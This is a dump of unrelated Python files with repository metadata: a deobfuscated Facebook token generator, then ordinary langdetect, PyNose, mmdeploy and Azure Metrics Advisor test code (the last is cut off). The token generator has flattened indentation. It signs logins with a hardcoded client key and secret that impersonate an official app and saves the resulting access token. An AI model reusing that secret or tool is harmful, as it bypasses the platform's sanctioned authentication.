588d033cd648dd40b9af5f385c2cc4e5591df484
| 5,793
|
py
|
Python
|
CNK-GToken/cnk-gtoken_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
CNK-GToken/cnk-gtoken_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
CNK-GToken/cnk-gtoken_dec.py
|
Wh014M/Reverse-Engineering
|
f7aae2c43f7ea4a6730964d085c07814b6660a53
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Deobfuscated BY HTR-TECH | Tahmid Rayat
# Github : https://github.com/htr-tech
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook : https://fb.com/tahmid.rayat.oficial
# Messenger : https://m.me/tahmid.rayat.oficial
import os, json, base64, hashlib, random, time, sys
from requests import get, post
P = '\x1b[0m'
H = '\x1b[031m'
G = '\x1b[032m'
K = '\x1b[0;33m'
L = P + '=' * 56
V = ('{}[{}+{}]{} ').format(G, P, G, P)
print "\x1b[30;1m\xe2\x95\x94\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x97\n\xe2\x95\x91\x1b[31;1m ____ _ _ _ __ ____ _____ _ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[31;1m / ___| \\ | | |/ / / ___|_ _|__ | | _____ _ __ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[31;1m| | | \\| | ' /_____| | _ | |/ _ \\| |/ / _ \\ '_ \\ \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[0;37m| |___| |\\ | . \\_____| |_| | | | (_) | < __/ | | |\x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[0;37m \\____|_| \\_|_|\\_\\ \\____| |_|\\___/|_|\\_\\___|_| |_|\x1b[30;1m\xe2\x95\x91\n\xe2\x95\xa0\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\xa3\x1b[30;1m\n\xe2\x95\x91\x1b[31;1m\xe2\x9e\xa2 Author : Febry [ xNot_Found ] \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[32;1m\xe2\x9e\xa3 Contact: +62823-8637-2115 \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[33;1m\xe2\x9e\xa2 Email : febryafriansyah@programmer.net \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[34;1m\xe2\x9e\xa3 Website: http://hatakecnk.noads.biz \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x91\x1b[37;1m\xe2\x9e\xa2 Github : https://github.com/hatakecnk \x1b[30;1m\xe2\x95\x91\n\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90\xe2\x95\x9d"
try:
ID = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Input Your Username \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
PW = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Input Your Password \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
API_SECRET = '62f8ce9f74b12f84c123cc23437a4a32'
data = {'api_key': '882a8490361da98702bf97a021ddc14d', 'credentials_type': 'password', 'email': ID, 'format': 'JSON', 'generate_machine_id': '1', 'generate_session_cookies': '1', 'locale': 'en_US', 'method': 'auth.login', 'password': PW, 'return_ssl_resources': '0', 'v': '1.0'}
sig = 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail=' + ID + 'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword=' + PW + 'return_ssl_resources=0v=1.0' + API_SECRET
x = hashlib.new('md5')
x.update(sig)
data.update({'sig': x.hexdigest()})
def Token():
R = json.loads(get('https://api.facebook.com/restserver.php', params=data).text)
try:
T = R['access_token']
Token = open('token.txt', 'wb')
Token.write(T)
print V + 'Token has been saved as token.txt'
            a = raw_input('\x1b[0;37m\xe2\x94\x8c\xe2\x94\x80[\x1b[31;1m Show Access Token (y/n) \x1b[0;37m]\n\x1b[0;37m\xe2\x94\x94\xe2\x94\x80[\x1b[31;1m$\x1b[0;37m]> \x1b[33;1m')
if a == 'y':
print '\n' + L + '\n\x1b[35;1m' + T + '\n' + L
else:
sys.exit()
except:
print H + '\n[!]' + P + ' Failed'
except IndexError:
print '\n\x1b[31;1m[\x1b[0;37m!\x1b[31;1m] \x1b[0;37mthere is an error'
sys.exit()
except KeyboardInterrupt:
print '\n\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m ctrl+c detected'
print '\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m trying to exit'
time.sleep(3)
sys.exit()
except EOFError:
print '\n\n\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m ctrl+d detected'
print '\x1b[31m[\x1b[0m!\x1b[31m]\x1b[0m trying to exit'
time.sleep(3)
sys.exit()
if __name__ == '__main__':
try:
Token()
except ImportError:
exit()
| 93.435484
| 3,118
| 0.650268
| 1,101
| 5,793
| 3.317893
| 0.158946
| 0.308787
| 0.399124
| 0.532165
| 0.636189
| 0.630441
| 0.630441
| 0.621133
| 0.621133
| 0.614837
| 0
| 0.265918
| 0.124288
| 5,793
| 61
| 3,119
| 94.967213
| 0.454169
| 0.039013
| 0
| 0.22
| 0
| 0.14
| 0.794065
| 0.615468
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.06
| 0.06
| null | null | 0.18
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 11
|
54755487584149a3e622cefc821b0f8ef2e2ac42
| 1,679
|
py
|
Python
|
langdetect/tests/utils/test_unicode_block.py
|
mrhaanraadts/langdetect
|
edc668bc019719ed1e5718ad59bf339180de09e1
|
[
"Apache-2.0"
] | 1,269
|
2015-01-05T13:51:00.000Z
|
2022-03-28T03:07:31.000Z
|
langdetect/tests/utils/test_unicode_block.py
|
HelenaSak/langdetect
|
c4b28fe44370863eb6e2f73cfe0cfae5d5a895da
|
[
"Apache-2.0"
] | 75
|
2015-02-16T15:52:41.000Z
|
2022-02-19T10:17:26.000Z
|
langdetect/tests/utils/test_unicode_block.py
|
HelenaSak/langdetect
|
c4b28fe44370863eb6e2f73cfe0cfae5d5a895da
|
[
"Apache-2.0"
] | 205
|
2015-01-01T18:33:32.000Z
|
2022-03-31T22:52:32.000Z
|
import unittest
import six
from langdetect.utils import unicode_block
class UnicodeBlockTest(unittest.TestCase):
def test_unicode_block(self):
self.assertEqual(unicode_block.unicode_block(six.u('\u0065')), unicode_block.UNICODE_BASIC_LATIN)
self.assertEqual(unicode_block.unicode_block(six.u('\u007F')), unicode_block.UNICODE_BASIC_LATIN)
self.assertEqual(unicode_block.unicode_block(six.u('\u0080')), unicode_block.UNICODE_LATIN_1_SUPPLEMENT)
self.assertEqual(unicode_block.unicode_block(six.u('\u21FF')), unicode_block.UNICODE_ARROWS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2200')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2201')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u22FF')), unicode_block.UNICODE_MATHEMATICAL_OPERATORS)
self.assertEqual(unicode_block.unicode_block(six.u('\u2300')), unicode_block.UNICODE_MISCELLANEOUS_TECHNICAL)
# test only on wide builds (i.e. Python 3)
if len(six.u('\U0010FFFF')) == 1:
self.assertEqual(unicode_block.unicode_block(six.u('\U000F0000')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_A)
self.assertEqual(unicode_block.unicode_block(six.u('\U000FFFFF')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_A)
self.assertEqual(unicode_block.unicode_block(six.u('\U00100000')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_B)
self.assertEqual(unicode_block.unicode_block(six.u('\U0010FFFF')), unicode_block.UNICODE_SUPPLEMENTARY_PRIVATE_USE_AREA_B)
| 69.958333
| 134
| 0.775462
| 214
| 1,679
| 5.733645
| 0.247664
| 0.371638
| 0.371638
| 0.264059
| 0.718826
| 0.718826
| 0.718826
| 0.718826
| 0.466993
| 0.466993
| 0
| 0.037483
| 0.110185
| 1,679
| 23
| 135
| 73
| 0.783802
| 0.023824
| 0
| 0
| 0
| 0
| 0.059866
| 0
| 0
| 0
| 0
| 0
| 0.666667
| 1
| 0.055556
| false
| 0
| 0.166667
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
54899422f1f04a9b95ecbcfe68e47f0d379f21dd
| 672
|
py
|
Python
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
WANGJIEKE/pycharm_test_smell_plugin
|
081e5f9dcc416da4a290bcc5102ce46f104afefa
|
[
"Apache-2.0"
] | 33
|
2021-08-05T04:54:25.000Z
|
2022-03-21T18:44:55.000Z
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
WANGJIEKE/pycharm_test_smell_plugin
|
081e5f9dcc416da4a290bcc5102ce46f104afefa
|
[
"Apache-2.0"
] | 19
|
2021-09-10T08:22:24.000Z
|
2022-02-15T09:26:57.000Z
|
plugin/src/test/resources/org/jetbrains/research/pynose/plugin/inspections/data/constructor/test_constructor_multiple.py
|
JetBrains-Research/PyNose
|
43690aa7fc4a964db39b165ea9fefcc8a7c0b420
|
[
"Apache-2.0"
] | null | null | null |
import unittest
class SomeClass(unittest.TestCase):
def <weak_warning descr="You can use the setUp() method to create the test fixture, instead of initializing the constructor">__init__</weak_warning>(self):
super().__init__()
def test_something(self):
pass
class OtherClass(unittest.TestCase):
def <weak_warning descr="You can use the setUp() method to create the test fixture, instead of initializing the constructor">__init__</weak_warning>(self):
super().__init__()
def test_something_other(self):
pass
class AnotherClass:
def __init__(self):
pass
def test_something_else(self):
pass
| 23.172414
| 159
| 0.700893
| 85
| 672
| 5.2
| 0.376471
| 0.099548
| 0.108597
| 0.104072
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0.719457
| 0
| 0
| 0.21131
| 672
| 28
| 160
| 24
| 0.833962
| 0
| 0
| 0.5
| 0
| 0
| 0.291667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0.25
| 0.0625
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
54ac8a1a3fc4100168778c3e4d41011e136fe3c3
| 137
|
py
|
Python
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 746
|
2021-12-27T10:50:28.000Z
|
2022-03-31T13:34:14.000Z
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 253
|
2021-12-28T05:59:13.000Z
|
2022-03-31T18:22:25.000Z
|
mmdeploy/core/__init__.py
|
zhiqwang/mmdeploy
|
997d111a6f4ca9624ab3b36717748e6ce002037d
|
[
"Apache-2.0"
] | 147
|
2021-12-27T10:50:33.000Z
|
2022-03-30T10:44:20.000Z
|
# Copyright (c) OpenMMLab. All rights reserved.
from .optimizers import * # noqa: F401,F403
from .rewriters import * # noqa: F401,F403
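# The star re-exports above need the '# noqa' markers to silence flake8's F401
# (unused import) and F403 (star import), the usual trade-off for a package facade.
# A stricter alternative, sketched in comments since it only makes sense inside a
# package, enumerates the public surface explicitly; the symbol names below are
# illustrative, not mmdeploy's actual API:
#
#     from .optimizers import Optimizer   # hypothetical symbol
#     from .rewriters import Rewriter     # hypothetical symbol
#     __all__ = ['Optimizer', 'Rewriter']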
| 34.25
| 47
| 0.722628
| 18
| 137
| 5.5
| 0.722222
| 0.20202
| 0.282828
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 0.167883
| 137
| 3
| 48
| 45.666667
| 0.763158
| 0.562044
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
54b7eaf9936ec14bc1b95b09bcbcc560f20cf000
| 54,314
|
py
|
Python
|
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2021-09-07T18:39:05.000Z
|
2021-09-07T18:39:05.000Z
|
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | null | null | null |
sdk/metricsadvisor/azure-ai-metricsadvisor/tests/async_tests/test_data_feeds_async.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 1
|
2022-03-04T06:21:56.000Z
|
2022-03-04T06:21:56.000Z
|
# coding=utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import datetime
import uuid
from dateutil.tz import tzutc
import pytest
import functools
from azure.core.exceptions import ResourceNotFoundError
from azure.ai.metricsadvisor.models import (
SqlServerDataFeedSource,
AzureTableDataFeedSource,
AzureBlobDataFeedSource,
AzureCosmosDbDataFeedSource,
DataFeedMetric,
DataFeedDimension,
DataFeedSchema,
DataFeedIngestionSettings,
DataFeedGranularity,
DataFeedMissingDataPointFillSettings,
DataFeedRollupSettings,
AzureApplicationInsightsDataFeedSource,
AzureDataExplorerDataFeedSource,
InfluxDbDataFeedSource,
AzureDataLakeStorageGen2DataFeedSource,
MongoDbDataFeedSource,
MySqlDataFeedSource,
PostgreSqlDataFeedSource,
)
from devtools_testutils import AzureRecordedTestCase
from devtools_testutils.aio import recorded_by_proxy_async
from azure.ai.metricsadvisor.aio import MetricsAdvisorAdministrationClient
from base_testcase_async import TestMetricsAdvisorClientBase, MetricsAdvisorClientPreparer, CREDENTIALS, ids
MetricsAdvisorPreparer = functools.partial(MetricsAdvisorClientPreparer, MetricsAdvisorAdministrationClient)
class TestMetricsAdvisorAdministrationClient(TestMetricsAdvisorClientBase):
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_simple_data_feed(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query="select * from adsample2 where Timestamp = @StartTime"
),
granularity="Daily",
schema=["cost", "revenue"],
ingestion_settings=datetime.datetime(2019, 10, 1)
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Daily"
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_from_sql_server(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admins=["yournamehere@microsoft.com"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="SmartFilling"
),
rollup_settings=DataFeedRollupSettings(
rollup_type="NoRollup",
rollup_method="None",
),
viewers=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Daily"
assert data_feed.granularity.custom_granularity_value is None
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.schema.metrics[0].display_name == "display cost"
assert data_feed.schema.metrics[1].display_name == "display revenue"
assert data_feed.schema.metrics[0].description == "the cost"
assert data_feed.schema.metrics[1].description == "the revenue"
assert data_feed.schema.dimensions[0].name == "category"
assert data_feed.schema.dimensions[1].name == "city"
assert data_feed.schema.dimensions[0].display_name == "display category"
assert data_feed.schema.dimensions[1].display_name == "display city"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert data_feed.ingestion_settings.data_source_request_concurrency == 0
assert data_feed.ingestion_settings.ingestion_retry_delay == -1
assert data_feed.ingestion_settings.ingestion_start_offset == -1
assert data_feed.ingestion_settings.stop_retry_after == -1
assert "yournamehere@microsoft.com" in data_feed.admins
assert data_feed.data_feed_description == "my first data feed"
assert data_feed.missing_data_point_fill_settings.fill_type == "SmartFilling"
assert data_feed.rollup_settings.rollup_type == "NoRollup"
assert data_feed.rollup_settings.rollup_method == "None"
assert data_feed.viewers == ["viewers"]
assert data_feed.access_mode == "Private"
assert data_feed.action_link_template == "action link template"
assert data_feed.status == "Active"
assert data_feed.is_admin
assert data_feed.metric_ids is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
with pytest.raises(ResourceNotFoundError):
await client.get_data_feed(variables["data_feed_id"])
return variables
@pytest.mark.skip("skip test")
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_from_sql_server_with_custom_values(self, client, variables):
data_feed_name = self.create_random_name("testfeed")
if self.is_live:
variables["data_feed_name"] = data_feed_name
async with client:
try:
data_feed = await client.create_data_feed(
variables["data_feed_name"],
source=SqlServerDataFeedSource(
connection_string=self.sql_server_connection_string,
query=u"select * from adsample2 where Timestamp = @StartTime"
),
granularity=DataFeedGranularity(
granularity_type="Custom",
custom_granularity_value=400
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost", display_name="display cost", description="the cost"),
DataFeedMetric(name="revenue", display_name="display revenue", description="the revenue")
],
dimensions=[
DataFeedDimension(name="category", display_name="display category"),
DataFeedDimension(name="city", display_name="display city")
],
timestamp_column="Timestamp"
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
data_source_request_concurrency=0,
ingestion_retry_delay=-1,
ingestion_start_offset=-1,
stop_retry_after=-1,
),
admins=["yournamehere@microsoft.com"],
data_feed_description="my first data feed",
missing_data_point_fill_settings=DataFeedMissingDataPointFillSettings(
fill_type="CustomValue",
custom_fill_value=10
),
rollup_settings=DataFeedRollupSettings(
rollup_type="AlreadyRollup",
rollup_method="Sum",
rollup_identification_value="sumrollup"
),
viewers=["viewers"],
access_mode="Private",
action_link_template="action link template"
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "SqlServer"
assert data_feed.source.query is not None
assert data_feed.granularity.granularity_type == "Custom"
assert data_feed.granularity.custom_granularity_value == 400
assert data_feed.schema.metrics[0].name == "cost"
assert data_feed.schema.metrics[1].name == "revenue"
assert data_feed.schema.metrics[0].display_name == "display cost"
assert data_feed.schema.metrics[1].display_name == "display revenue"
assert data_feed.schema.metrics[0].description == "the cost"
assert data_feed.schema.metrics[1].description == "the revenue"
assert data_feed.schema.dimensions[0].name == "category"
assert data_feed.schema.dimensions[1].name == "city"
assert data_feed.schema.dimensions[0].display_name == "display category"
assert data_feed.schema.dimensions[1].display_name == "display city"
assert data_feed.ingestion_settings.ingestion_begin_time == datetime.datetime(2019, 10, 1, tzinfo=tzutc())
assert data_feed.ingestion_settings.data_source_request_concurrency == 0
assert data_feed.ingestion_settings.ingestion_retry_delay == -1
assert data_feed.ingestion_settings.ingestion_start_offset == -1
assert data_feed.ingestion_settings.stop_retry_after == -1
assert "yournamehere@microsoft.com" in data_feed.admins
assert data_feed.data_feed_description == "my first data feed"
assert data_feed.missing_data_point_fill_settings.fill_type == "CustomValue"
assert data_feed.missing_data_point_fill_settings.custom_fill_value == 10
assert data_feed.rollup_settings.rollup_type == "AlreadyRollup"
assert data_feed.rollup_settings.rollup_method == "Sum"
assert data_feed.rollup_settings.rollup_identification_value == "sumrollup"
assert data_feed.viewers == ["viewers"]
assert data_feed.access_mode == "Private"
assert data_feed.action_link_template == "action link template"
assert data_feed.status == "Active"
assert data_feed.is_admin
assert data_feed.metric_ids is not None
finally:
await self.clean_up(client.delete_data_feed, variables)
with pytest.raises(ResourceNotFoundError):
await client.get_data_feed(variables["data_feed_id"])
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_table(self, client, variables):
name = self.create_random_name("tablefeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureTableDataFeedSource(
connection_string="azure_table_connection_string",
query="PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'",
table="adsample"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureTable"
assert data_feed.source.table == "adsample"
assert data_feed.source.query == "PartitionKey ge '@StartTime' and PartitionKey lt '@EndTime'"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_blob(self, client, variables):
name = self.create_random_name("blobfeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureBlobDataFeedSource(
connection_string="azure_blob_connection_string",
container="adsample",
blob_template="%Y/%m/%d/%h/JsonFormatV2.json"
),
granularity=DataFeedGranularity(
granularity_type="Daily",
),
schema=DataFeedSchema(
metrics=[
DataFeedMetric(name="cost"),
DataFeedMetric(name="revenue")
],
dimensions=[
DataFeedDimension(name="category"),
DataFeedDimension(name="city")
],
),
ingestion_settings=DataFeedIngestionSettings(
ingestion_begin_time=datetime.datetime(2019, 10, 1),
),
)
if self.is_live:
variables["data_feed_id"] = data_feed.id
assert data_feed.id is not None
assert data_feed.created_time is not None
assert data_feed.name is not None
assert data_feed.source.data_source_type == "AzureBlob"
assert data_feed.source.container == "adsample"
assert data_feed.source.blob_template == "%Y/%m/%d/%h/JsonFormatV2.json"
finally:
await self.clean_up(client.delete_data_feed, variables)
return variables
@AzureRecordedTestCase.await_prepared_test
@pytest.mark.parametrize("credential", CREDENTIALS, ids=ids)
@MetricsAdvisorPreparer()
@recorded_by_proxy_async
async def test_create_data_feed_with_azure_cosmos_db(self, client, variables):
name = self.create_random_name("cosmosfeed")
if self.is_live:
variables["data_feed_name"] = name
async with client:
try:
data_feed = await client.create_data_feed(
name=variables["data_feed_name"],
source=AzureCosmosDbDataFeedSource(
connection_string="azure_cosmosdb_connection_string",
sql_query="'SELECT * FROM Items I where I.Timestamp >= @StartTime and I.Timestamp < @EndTime'",
database="adsample",
collection_id="adsample"
),
